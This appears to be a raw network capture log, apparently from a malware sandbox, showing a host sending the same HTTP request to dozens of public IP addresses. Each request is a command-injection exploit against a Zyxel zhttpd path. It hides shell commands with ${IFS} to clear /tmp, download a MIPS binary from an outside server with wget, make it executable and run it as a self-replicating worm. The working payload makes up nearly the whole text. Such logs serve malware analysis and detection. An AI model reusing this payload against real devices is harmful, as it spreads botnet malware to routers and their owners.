                                    Jan 13, 2024 19:02:38.271255970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5432192.168.2.1360912159.21.182.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271317959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5433192.168.2.1346150115.99.192.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271358013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5434192.168.2.135165839.110.95.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271406889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5435192.168.2.1333908144.160.83.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271464109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5436192.168.2.1338470187.7.81.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271522999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5437192.168.2.1354684115.132.174.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271578074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5438192.168.2.1338990164.170.204.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271636009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5439192.168.2.134305454.224.114.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271702051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5440192.168.2.1350810167.149.15.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271734953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5441192.168.2.135817054.132.80.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271794081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5442192.168.2.133947035.7.126.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271828890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5443192.168.2.135894012.195.127.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271904945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5444192.168.2.1354016202.180.111.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.271970987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5445192.168.2.1333906209.87.165.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272011042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5446192.168.2.1356126196.250.180.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272066116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5447192.168.2.1354870104.150.223.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272135019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5448192.168.2.1345750138.253.211.68443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272190094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5449192.168.2.133520893.95.0.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272238016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5450192.168.2.135509619.81.18.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272284985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5451192.168.2.13340502.23.158.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272329092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5452192.168.2.134976232.25.227.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272368908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5453192.168.2.133991895.231.185.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272428989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5454192.168.2.133618478.58.112.90443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272453070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5455192.168.2.1337136185.67.226.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272512913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5456192.168.2.133296090.235.160.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272558928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5457192.168.2.135419258.106.20.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272595882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5458192.168.2.1356500176.212.69.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272644043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5459192.168.2.1348384158.250.102.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272713900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5460192.168.2.1337420152.97.74.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272789955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5461192.168.2.1341726145.21.216.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272818089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5462192.168.2.1357220191.157.86.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272876978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5463192.168.2.1345366132.94.66.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272916079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5464192.168.2.135292648.74.209.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.272998095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5465192.168.2.134924497.202.210.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273026943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5466192.168.2.134526247.16.125.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273078918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5467192.168.2.133577432.84.64.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273159027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5468192.168.2.1337110124.107.141.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273205042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5469192.168.2.135054066.248.29.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273257971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5470192.168.2.1354422147.215.112.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273299932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5471192.168.2.1360616175.244.215.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273361921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5472192.168.2.1337556222.107.118.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273410082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5473192.168.2.1352080204.81.97.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273464918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5474192.168.2.134859250.103.211.199443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273509026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5475192.168.2.1349116178.4.43.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273555994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5476192.168.2.133375899.138.245.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273621082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5477192.168.2.1344066136.82.211.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273683071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5478192.168.2.1338734102.7.225.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273744106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5479192.168.2.1359982148.153.62.27443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273808956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5480192.168.2.1342120149.76.190.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273843050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5481192.168.2.134401675.124.26.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273899078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5482192.168.2.1349854221.128.35.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273943901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5483192.168.2.135894672.96.121.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.273994923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5484192.168.2.13449629.183.32.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274046898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5485192.168.2.1336514153.158.167.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274096966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5486192.168.2.1336632130.97.23.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274122000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5487192.168.2.1342626152.81.204.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274198055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5488192.168.2.134283897.62.82.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274250031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5489192.168.2.1349428121.173.60.5443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274317980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5490192.168.2.135322888.187.105.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274341106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5491192.168.2.1360028203.169.17.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274405003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5492192.168.2.135858247.47.122.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274446011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5493192.168.2.134702062.255.185.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:38.274503946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    5494192.168.2.1347936109.75.88.208443
                                    TimestampBytes transferredDirectionData
